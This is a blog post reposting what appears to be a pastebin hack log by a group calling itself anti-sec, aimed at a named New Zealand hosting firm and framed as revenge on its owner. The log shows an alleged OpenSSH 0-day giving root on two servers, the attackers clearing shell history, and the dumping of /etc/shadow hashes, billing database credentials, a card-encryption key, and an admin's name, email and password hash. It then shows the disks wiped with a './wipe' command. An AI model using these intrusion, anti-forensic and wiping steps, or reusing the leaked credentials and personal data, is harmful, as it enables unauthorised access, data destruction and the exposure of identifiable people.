Tuesday, July 7, 2009

anti-sec hack log

Someone posted what appears to be a hack log on pastebin, complete with the output from a 0-day OpenSSH exploit (if in fact this is real).

Posted by pwnt on Sat 4 Jul 10:09
  1.  
  2.                        __  .__                                
  3.         _____    _____/  |_|__|           ______ ____   ____  
  4.         \__  \  /    \   __\  |  ______  /  ___// __ \_/ ___\
  5.          / __ \|   |  \  | |  | /_____/  \___ \\  ___/\  \___
  6.         (____  /___|  /__| |__|         /____  >\___  >\___  >
  7.              \/     \/                       \/     \/     \/
  8.                                                
  9.                                         Some of you have seen a lot of casualties lately in the webhosting scene:
  10.                                         hosting companies being wiped and rm'd at the expense of their clients. While
  11.                                         some of this is collateral damage, we're about to show you, ladies and
  12.                                         gentlemen, that sometimes you aren't pwned because of who you host but what you
  13.                                         say.
  14.                                                
  15.                                                 Practice what you preach.
  16.  
  17. - Why SSANZ?
  18.  
  19. Owned by a kid who claims he can manage, secure and audit servers,
  20. he offers a service that he clearly cannot provide, we are against that.
  21.  
  22.  
  23. LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
  24.  
  25. >>Logan of New Zealand. CEO of Server Systems Administration NZ.
  26. >>
  27. >> Signature:   
  28. >>Server Systems Administration NZ | SSANZ
  29. >>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
  30. >>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
  31.        
  32. Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:
  33.  
  34.  
  35. >>Server Management - $25 Per Month
  36. >>
  37. >>- Full Management - Support, & 3rd Party Installs
  38. >>- Monitoring - Included - up to 3 ports.
  39. >>- Emergency Recovery
  40.  
  41.  
  42. >>Server Security - $50
  43. >>
  44. >>- Initial Scan & Report
  45. >>- Security Hardening & Security Installs/tweaks.
  46. >>- IDS, Security Monitoring & mod_sec configured.
  47. >>- Finishing Security Scan & SSANZ Custom Scans.
  48. >>
  49. >>
  50. >>Emergency Server Recovery - $150
  51. >>
  52. >>- Recover Hacked Server Systems
  53. >>- Recover deleted data
  54. >>- ANTI-dDOS Services
  55. >>- dDOS Investigation
  56.  
  57. Security Worries? Security Audits - 50% OFF  <http://www.webhostingtalk.com/showthread.php?t=859795>:
  58.  
  59. >>Get your site/server audited to ensure your business data is
  60. >>secure before you become a statistic.
  61. >>
  62. >>In the past 6 months, e-crime activity reports have increased by
  63. >>45% due to the global economic recession.
  64. >>
  65. >>What is involved in a Full Security Audit?
  66. >>
  67. >>External Security
  68. >>
  69. >>    * Scan for Shells/malicious scripts
  70. >>    * Scan for vulnerable web content ( permissions, RFI's )
  71. >>    * Scans for Vulnerable Server Services
  72. >>    * Vulnerable Ports
  73. >>    * Testing of TCP handling - dDOS test.
  74. >>    * Scan for Vulnerable PHP scripts/mods.
  75. >>    * Control Panel Security Audit ( external )
  76. >>    * Multiple Unique SSANZ Custom Scans*
  77. >>
  78. >>
  79. >>Internal Security
  80. >>
  81. >>    * Permissions/Ownership(s) Review
  82. >>    * Apache/Webserver Security
  83. >>    * User Account Security & binaries access audit
  84. >>    * Local RFI Exploits located/patched.
  85. >>    * System Binary Security Audit
  86. >>    * Firewall/IPTABLES Audit
  87. >>    * Bruteforce detection test & audit
  88. >>    * Root Access Authentication Audit
  89. >>    * Local PHP Functions Audit
  90. >>    * Control Panel Security Audit ( Internal )
  91. >>    * Kernel Security Audit
  92. >>    * Additional SSANZ Custom Scans/Audit*
  93.  
  94. We at anti-sec decided to give you a _FREE_ Full Security Audit!*
  95.  
  96. * `rm -rf /` is included.
  97.  
  98.  
  99. anti-sec:~/pwn# ./map ssanz.net
  100.        
  101.         IP: 66.197.143.133 ( osiris.ssanz.net )
  102.         WWW: Apache/2.2.11
  103.         SSH: SSH-2.0-OpenSSH_4.3
  104.        
  105.         IP: 66.197.204.101 ( devil.ssanz.net )
  106.         WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
  107.         SSH: SSH-2.0-OpenSSH_4.3
  108.  
  109. anti-sec:~/pwn# cd xpl/
  110.  
  111. anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
  112.  
  113.                 [+] 0wn0wn - anti-sec group
  114.                 [+] Target: 66.197.143.133
  115.                 [+] SSH Port: 22
  116.                
  117.                 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
  118.  
  119. sh-3.2# export HISTFILE=/dev/null
  120.  
  121. sh-3.2# id
  122. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
  123.  
  124. sh-3.2# uname -a
  125. Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
  126.  
  127. sh-3.2# head -n1 /etc/shadow
  128. root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
  129.  
  130. sh-3.2# w
  131.  03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78, 10.73
  132. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  133. root     pts/0    125.238.144.224  20:17    7:26m 13:18  13:18  htop
  134.  
  135. sh-3.2# pwd
  136. /root
  137.  
  138. sh-3.2# ls -la
  139. total 3008
  140. drwxr-x--- 24 root     root        4096 Jul  4 03:43 .
  141. drwxr-xr-x 27 root     root        4096 Jun 27 02:49 ..
  142. -rw-------  1 root     root         957 Jun 13 07:24 .accesshash
  143. -rw-------  1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
  144. -rw-------  1 root     root       15460 Jul  3 23:38 .bash_history
  145. -rw-r--r--  1 root     root          24 Jan  6  2007 .bash_logout
  146. -rw-r--r--  1 root     root         191 Jan  6  2007 .bash_profile
  147. -rw-r--r--  1 root     root         176 Jan  6  2007 .bashrc
  148. drwxrwxrwx  3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
  149. -rw-r--r--  1 root     root      141564 Mar  1  2007 bwm-ng-0.6.tar.gz
  150. drwxr-xr-x  3 root     root        4096 Nov 15  2006 cmm
  151. -rw-r--r--  1 root     root       18656 Feb 28 11:32 cmm.tgz
  152. drwxr-xr-x  3 root     root        4096 Nov  5  2006 cmq
  153. -rw-r--r--  1 root     root       14507 Oct 10  2008 cmq.tgz
  154. drwxr-xr-x  4 root     root        4096 Jun  1 14:33 .cpanel
  155. drwxr-xr-x  4 root     root        4096 Jun  1 17:10 cpanel3-skel
  156. drwx------  3 root     root        4096 Jun  1 13:50 .cpobjcache
  157. drwxr-xr-x 10 root     root        4096 Apr 13 16:17 csf
  158. -rw-r--r--  1 root     root      430121 May 15 12:07 csf.tgz
  159. -rw-r--r--  1 root     root         100 Jan  6  2007 .cshrc
  160. drwx------  2 root     root        4096 Jun  1 13:54 .elinks
  161. -rw-r--r--  1 root     root     1176672 Jul  4 03:40 error_log
  162. -rw-r--r--  1 root     root          16 Jun  3 08:34 .forward
  163. drwx------  3 root     root        4096 Jun  1 10:39 .gconf
  164. drwx------  2 root     root        4096 Jun  1 10:39 .gconfd
  165. drwxr-xr-x  4 root     root        4096 Jun 10 23:42 .gem
  166. drwx------  2 root     root        4096 Jun  1 13:55 .gnupg
  167. drwxrwxrwx  5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
  168. -rw-r--r--  1 root     root      414870 Sep 23  2008 htop-0.8.1.tar.gz
  169. -rw-r--r--  1 root     root         561 Jun 27 02:48 .htoprc
  170. -rw-r--r--  1 root     root        8144 Jun  6 19:23 index.html
  171. -rw-r--r--  1 root     root        4246 Jun  1 10:39 install.log.syslog
  172. drwxr-xr-x  6      500 root        4096 Sep 13  2005 iptraf-3.0.0
  173. -rw-r--r--  1 root     root           0 Jun 27 09:21 iptraf-3.0.0.tar.gz
  174. -rw-r--r--  1 root     root           0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
  175. -rw-r--r--  1 root     root           0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
  176. -rw-r--r--  1 root     root      575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
  177. drwx------  6 root     root        4096 Jun  1 14:21 .MirrorSearch
  178. -rw-------  1 root     root          61 Jun 12 21:04 .my.cnf
  179. -rw-------  1 root     root         139 Jul  3 10:51 .mysql_history
  180. -rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
  181. -rw-r--r--  1 root     root         264 Jul  2 21:43 .pearrc
  182. drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
  183. drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
  184. -rw-------  1 root     root        1024 Jun  7 19:50 .rnd
  185. drwx------  3 root     root        4096 Jun  1 14:29 .spamassassin
  186. drwx------  2 root     root        4096 Jun  2 06:41 .ssh
  187. -rw-r--r--  1 root     root         129 Jan  6  2007 .tcshrc
  188. drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
  189. -rw-------  1 root     root           0 Jun  7 22:01 .trustwavereqs
  190. drw-------  2 root     root        4096 Jun  3 08:18 whmrbackups
  191. drw-------  3 root     root        4096 Jun 10 08:25 whmrcorebackups
  192.  
  193.  
  194.  
  195. sh-3.2# cat .bash_history
  196. htop
  197. htop
  198. p
  199. htop
  200. tail -f /var/log/secure
  201. tail -f /var/log/secure
  202. [snip]
  203. nano highperformance.conf
  204. service httpd restart
  205. nano highperformance.conf
  206. service httpd restart
  207. nano highperformance.conf
  208. nano httpd.conf
  209. nano php.conf
  210. ls
  211. nano modsec2.conf
  212. ls
  213. [snip]
  214. nano visit4cash.net.conf
  215. cd ..
  216. [snip]
  217. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  218. ps -aux|grep -i HTTP|wc -l
  219. w
  220. bwm-ng
  221. [snip]
  222. netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
  223. netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
  224. netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
  225. netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
  226. netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
  227. netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
  228. netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
  229. netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
  230. [snip]
  231. /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
  232. /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
  233. /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
  234. [snip]
  235. service cups stop
  236. chkconfig cups off
  237. service nfslock stop
  238. chkconfig nfslock off
  239. service rpcidmapd stop
  240. chkconfig rpcidmapd off
  241. service bluetooth stop
  242. chkconfig bluetooth off
  243. service anacron stop
  244. chkconfig anacron off
  245. service avahi-daemon stop
  246. chkconfig avahi-daemon off
  247. service hidd stop
  248. chkconfig hidd off
  249. service pcscd stop
  250. chkconfig pcscd off
  251. [snip]
  252. http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
  253. screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
  254. htop
  255. screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
  256. [snip]
  257. wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
  258. htop
  259. [snip]
  260. wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
  261. wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
  262. [snip]
  263. wget http://www.logview.org/logview-install
  264. chmod +x logview-install
  265. ./logview-install
  266. rm -rf logview-install
  267.  
  268. sh-3.2# grep sec /etc/userdomains
  269. affiliatesecrets.wecloak.info: wecloaki
  270. infosecawareness.info: andlyssa
  271. secproxy.info: secproxy
  272. infosecawareness.andly.ssanz.net: andlyssa
  273. greycloud.nakedinsects.com: greyclou
  274. serversecuritynz.com: forumz
  275. orac.nakedinsects.com: oracnz
  276. infernal.nakedinsects.com: infernal
  277. nakedinsects.com: ni
  278. fluffy.nakedinsects.com: fluffy
  279. quickclix.orac.nakedinsects.com: oracnz
  280. seco39.ssanz.net: secossan
  281.  
  282. sh-3.2# lastlog | grep -v Never
  283. Username         Port     From             Latest
  284. root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -0400 2009
  285. simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -0400 2009
  286. mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -0400 2009
  287. etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -0400 2009
  288.  
  289. sh-3.2# cd ~billing
  290. sh-3.2# ls -la
  291. total 301252
  292. drwx--x--x  15 billing billing     4096 Jun 28 02:08 .
  293. drwx--x--x 737 root    root       20480 Jul  4 00:37 ..
  294. lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs -> /usr/local/apache/domlogs/billing
  295. -rw-------   1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
  296. -rw-------   1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
  297. -rw-------   1 billing billing 84475934 Jun  3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
  298. -rw-------   1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
  299. -rw-r--r--   1 billing billing       24 May 27  2008 .bash_logout
  300. -rw-r--r--   1 billing billing      176 May 27  2008 .bash_profile
  301. -rw-r--r--   1 billing billing      124 May 27  2008 .bashrc
  302. -rw-------   1 billing billing       17 May 27  2008 .contactemail
  303. drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
  304. -rw-r-----   1 billing billing        0 Apr  4 06:32 cpbackup-exclude.conf
  305. drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
  306. drwxr-xr-x   3 billing billing     4096 Nov 12  2008 cpmove.psql.1240007789
  307. drwxr-xr-x   2 billing billing     4096 Apr 16 23:24 cpmove.psql.1243922290
  308. -rw-r--r--   1 billing billing   532304 Jul  4 03:45 error_log
  309. drwxr-x---   4 billing mail        4096 Jan 19 21:39 etc
  310. drwxr-x---   2 billing nobody      4096 May 27  2008 .htpasswds
  311. -rw-r--r--   1 billing billing        7 Nov 12  2008 .lang
  312. -rw-------   1 billing billing       15 Jun 28 02:07 .lastlogin
  313. drwxrwx---  10 billing billing     4096 Jul  2 21:43 mail
  314. drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
  315. drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
  316. drwxr-x---  24 billing nobody      4096 Jun 28 02:55 public_html
  317. drwx------   4 billing billing     4096 Jun  7 21:53 ssl
  318. drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
  319. drwx------   2 billing billing     4096 May 27  2008 .trash
  320. lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www -> public_html
  321. -rw-r--r--   1 billing billing      658 May 27  2008 .zshrc
  322.  
  323. sh-3.2# cd www/
  324.  
  325. sh-3.2# ls
  326. admin                 banned.php             configuressl.php  domainchecker.php  init.php             logout.php            postinfo.html       templates        viewticket.php  whois.php
  327. affiliates.php        billing                contact.php       downloads          installmingchowping  modules               _private            templates_c      _vti_bin
  328. aff.php               cart.php               creditcard.php    downloads.php      knowledgebase.php    networkissues.php     register.php        tutorials.php    _vti_cnf
  329. announcements.php     cgi-bin                dbconnect.php     htaccess.txt       lang                 networkissuesrss.php  serverstatus.php    upgrade          _vti_inf.html
  330. announcementsrss.php  clientarea.php         display.php       images             libs                 order.php             status              upgrade.php      _vti_log
  331. announcements.xml     configuration.php      dl.php            includes           link.php             passwordreminder.php  submitticket.php    viewemail.php    _vti_pvt
  332. attachments           configuration.php.new  dologin.php       index.php          login.php            pipe                  supporttickets.php  viewinvoice.php  _vti_txt
  333.  
  334. sh-3.2# cat configuration.php
  335. <?php
  336. $license="93881365561d";
  337. $db_host = "localhost";
  338. $db_username = "billing_billusr";
  339. $db_password = "X2qL6:qWCCb6";
  340. $db_name = "billing_billing";
  341. $cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
  342. $templates_compiledir = "templates_c/";
  343. ?>
  344.  
  345. sh-3.2# mysql
  346. Welcome to the MySQL monitor.  Commands end with ; or \g.
  347. Your MySQL connection id is 11021136
  348. Server version: 5.0.81-community MySQL Community Edition (GPL)
  349.  
  350. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
  351.  
  352. mysql> use billing_billing;
  353.  
  354. Reading table information for completion of table and column names
  355. You can turn off this feature to get a quicker startup with -A
  356.  
  357. Database changed
  358.  
  359. mysql> show tables;
  360. +----------------------------+
  361. | Tables_in_billing_billing  |
  362. +----------------------------+
  363. | mod_ipmanager              |
  364. | mod_ipmonitor              |
  365. | tblaccounts                |
  366. | tblactivitylog             |
  367. | tbladdons                  |
  368. | tbladminlog                |
  369. | tbladminperms              |
  370. | tbladminroles              |
  371. | tbladmins                  |
  372. | tbladminsecurityquestions  |
  373. | tblaffiliates              |
  374. | tblaffiliatesaccounts      |
  375. | tblaffiliateshistory       |
  376. | tblaffiliatespending       |
  377. | tblaffiliateswithdrawals   |
  378. | tblannouncements           |
  379. | tblbannedemails            |
  380. | tblbannedips               |
  381. | tblbillableitems           |
  382. | tblbrowserlinks            |
  383. | tblcalendar                |
  384. | tblcancelrequests          |
  385. | tblclientgroups            |
  386. | tblclients                 |
  387. | tblconfiguration           |
  388. | tblcontacts                |
  389. | tblcredit                  |
  390. | tblcurrencies              |
  391. | tblcustomfields            |
  392. | tblcustomfieldsvalues      |
  393. | tbldomainpricing           |
  394. | tbldomains                 |
  395. | tbldomainsadditionalfields |
  396. | tbldownloadcats            |
  397. | tbldownloads               |
  398. | tblemails                  |
  399. | tblemailtemplates          |
  400. | tblfraud                   |
  401. | tblgatewaylog              |
  402. | tblhosting                 |
  403. | tblhostingaddons           |
  404. | tblhostingconfigoptions    |
  405. | tblinvoiceitems            |
  406. | tblinvoices                |
  407. | tblknowledgebase           |
  408. | tblknowledgebasecats       |
  409. | tblknowledgebaselinks      |
  410. | tbllinks                   |
  411. | tblnetworkissues           |
  412. | tblnotes                   |
  413. | tblorders                  |
  414. | tblpaymentgateways         |
  415. | tblpricing                 |
  416. | tblproductconfiggroups     |
  417. | tblproductconfiglinks      |
  418. | tblproductconfigoptions    |
  419. | tblproductconfigoptionssub |
  420. | tblproductgroups           |
  421. | tblproducts                |
  422. | tblpromotions              |
  423. | tblquoteitems              |
  424. | tblquotes                  |
  425. | tblregistrars              |
  426. | tblservers                 |
  427. | tblsslorders               |
  428. | tbltax                     |
  429. | tblticketbreaklines        |
  430. | tblticketdepartments       |
  431. | tblticketescalations       |
  432. | tblticketlog               |
  433. | tblticketmaillog           |
  434. | tblticketnotes             |
  435. | tblticketpredefinedcats    |
  436. | tblticketpredefinedreplies |
  437. | tblticketreplies           |
  438. | tbltickets                 |
  439. | tblticketspamfilters       |
  440. | tbltodolist                |
  441. | tblupgrades                |
  442. | tblwhoislog                |
  443. +----------------------------+
  444. 80 rows in set (0.00 sec)
  445.  
  446. mysql> select name,ipaddress,hostname,username,password from tblservers;
  447. +--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
  448. | name         | ipaddress      | hostname         | username | password                                                                 |
  449. +--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
  450. | Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=                             |
  451. | Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
  452. | Devil        | 66.197.204.101 | devil.ssanz.net  | root     | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==             |
  453. +--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
  454. 3 rows in set (0.00 sec)
  455.  
  456. mysql> select firstname,lastname,email,username,password from tbladmins;
  457. +-----------+----------+-----------------+----------+----------------------------------+
  458. | firstname | lastname | email           | username | password                         |
  459. +-----------+----------+-----------------+----------+----------------------------------+
  460. | Logan     | Douglas  | Logan@ssanz.net | Admin    | c6df529826cf16ac5bedb424d8ac972b |
  461. +-----------+----------+-----------------+----------+----------------------------------+
  462. 1 row in set (0.06 sec)
  463.  
  464. mysql> quit
  465. Bye
  466.  
  467.  
  468. sh-3.2# df -h
  469. Filesystem            Size  Used Avail Use% Mounted on
  470. /dev/sda5             2.0G  477M  1.4G  26% /
  471. /dev/sda8             875G  147G  684G  18% /home
  472. /dev/sda3             9.7G  6.8G  2.5G  74% /usr
  473. /dev/sda2             9.7G  7.0G  2.3G  76% /var
  474. /dev/sda1              99M   23M   72M  24% /boot
  475. /dev/sda6             996M   64M  881M   7% /tmp
  476. tmpfs                 3.9G     0  3.9G   0% /dev/shm
  477. /dev/sdb1             459G  163G  273G  38% /backup
  478.  
  479. sh-3.2# ./wipe
  480.  
  481. sh-3.2# df -h
  482. Filesystem            Size  Used Avail Use% Mounted on
  483. /dev/sda5              64Z   64Z  1.5G 100% /
  484. /dev/sda8              64Z   64Z  729G 100% /home
  485. /dev/sda3              64Z   64Z  3.0G 100% /usr
  486. /dev/sda2              64Z   64Z  3.0G 100% /var
  487. /dev/sda1              16Z   16Z     0 100% /boot
  488. /dev/sda6              64Z   64Z  933M 100% /tmp
  489. tmpfs                 3.9G     0  3.9G   0% /dev/shm
  490. /dev/sdb1              64Z   64Z  296G 100% /backup
  491.  
  492. sh-3.2# exit
  493. exit
  494.  
  495.  
  496. -----------------------------------
  497.  
  498. osiris                  [ DOWN ]
  499. devil                   [  UP  ]
  500.  
  501. -----------------------------------
  502.  
  503. anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
  504.  
  505.                 [+] 0wn0wn - anti-sec group
  506.                 [+] Target: 66.197.204.101
  507.                 [+] SSH Port: 22
  508.                
  509.                 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
  510.  
  511. sh-3.2# export HISTFILE=/dev/null
  512.  
  513. sh-3.2# id
  514. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
  515.  
  516. sh-3.2# uname -a
  517. Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
  518.  
  519. sh-3.2# head -n1 /etc/shadow
  520. root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
  521.  
  522. sh-3.2# w
  523.  04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
  524. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  525. root     pts/0    125.238.144.224  20:18    7:51m  6:38   6:38  htop
  526.  
  527. sh-3.2# pwd
  528. /root
  529.  
  530. sh-3.2# ls -la
  531. total 1232
  532. drwxr-x--- 23 root root   4096 Jul  4 04:06 .
  533. drwxr-xr-x 25 root root   4096 Jun 29 14:33 ..
  534. -rw-------  1 root root    957 Jun 13 05:20 .accesshash
  535. -rw-------  1 root root    937 Jun 12 00:01 anaconda-ks.cfg
  536. -rw-------  1 root root   7258 Jun 30 10:03 .bash_history
  537. -rw-r--r--  1 root root     24 Jan  6  2007 .bash_logout
  538. -rw-r--r--  1 root root    191 Jan  6  2007 .bash_profile
  539. -rw-r--r--  1 root root    176 Jan  6  2007 .bashrc
  540. drwxrwxrwx  3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
  541. -rw-r--r--  1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
  542. drwxr-xr-x  3 root root   4096 Nov  5  2006 cmq
  543. -rw-r--r--  1 root root  14507 Oct 10  2008 cmq.tgz
  544. drwxr-xr-x  4 root root   4096 Jun 12 02:51 .cpanel
  545. drwxr-xr-x  4 root root   4096 Jun 12 03:26 cpanel3-skel
  546. drwx------  3 root root   4096 Jun 12 00:17 .cpobjcache
  547. drwxr-xr-x  2 root root   4096 Aug 21  2006 cse
  548. -rw-r--r--  1 root root  12207 Oct 10  2008 cse.tgz
  549. drwxr-xr-x 10 root root   4096 Jun  5 05:05 csf
  550. -rw-r--r--  1 root root 431490 Jun  5 10:52 csf.tgz
  551. -rw-r--r--  1 root root    100 Jan  6  2007 .cshrc
  552. drwx------  2 root root   4096 Jun 12 01:51 .elinks
  553. -rw-r--r--  1 root root     16 Jun 13 15:33 .forward
  554. drwx------  3 root root   4096 Jun 11 23:59 .gconf
  555. drwx------  2 root root   4096 Jun 11 23:59 .gconfd
  556. drwxr-xr-x  4 root root   4096 Jun 12 04:29 .gem
  557. drwx------  2 root root   4096 Jun 12 01:53 .gnupg
  558. drwxrwxrwx  6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
  559. -rw-r--r--  1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
  560. -rw-r--r--  1 root root    561 Jun 12 23:31 .htoprc
  561. -rw-r--r--  1 root root   4239 Jun 12 00:01 install.log.syslog
  562. drwx------  6 root root   4096 Jun 12 02:33 .MirrorSearch
  563. -rw-------  1 root root     37 Jun 12 02:11 .my.cnf
  564. drwxr-xr-x  3 1000 1000   4096 Jun 12 05:42 mytop-1.6
  565. -rw-r--r--  1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
  566. -rw-r--r--  1 root root    264 Jun 23 00:23 .pearrc
  567. drwxr-xr-x  2 root root   4096 Jun 12 03:21 public_ftp
  568. drwxr-xr-x  3 root root   4096 Jun 12 03:21 public_html
  569. -rw-------  1 root root   1024 Jun 12 02:50 .rnd
  570. drwx------  3 root root   4096 Jun 12 02:41 .spamassassin
  571. drwx------  2 root root   4096 Jun 22 09:11 .ssh
  572. -rw-r--r--  1 root root    129 Jan  6  2007 .tcshrc
  573. drwxr-xr-x  3 root root   4096 Jun 12 02:40 tmp
  574. drwxr-xr-x  2 root root   4096 Jun 16 19:23 .wapi
  575.  
  576. sh-3.2# cat .bash_history
  577. sh hninst.sh
  578. passwd
  579. fdisk -l
  580. exit
  581. w
  582. history
  583. screen -ls
  584. screen -r 2785.pts-0.devil
  585. exit
  586. wget http://merovingian.net.nz/htop-0.8.1.tar.gz
  587. [snip]
  588. csf -a 125.238.144.110
  589. exit
  590. cd /home
  591. ls
  592. wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
  593. [snip]
  594. wget http://visit4cash.net/mainfiles.tar.gz
  595. mv mainfiles.tar.gz /home/visit4ca/public_html
  596. cd /home
  597. cd visit4ca
  598. cd public_html
  599. ls
  600. tar zxvf mainfiles.tar.gz
  601. [snip]
  602. csf -d 89.165.50.38
  603. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  604. csf -d 89.165.50.38
  605. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  606. csf -d 89.165.50.38
  607. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  608. csf -d 89.165.50.38
  609. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  610. csf -d 89.165.50.38
  611. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  612. csf -d 89.165.50.38
  613. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  614. csf -d 89.165.50.38
  615. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  616. csf -d 89.165.50.38
  617. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  618. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  619. csf -d 89.38.206.233
  620. csf --restart
  621. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  622. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  623. csf -d 118.94.59.33
  624. netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
  625. [snip]
  626. screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
  627. screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
  628. screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
  629.  
  630. sh-3.2# cat /etc/userdomains
  631. advertising.ssanz.net: adserver
  632. forums.visit4cash.net: forumsv4
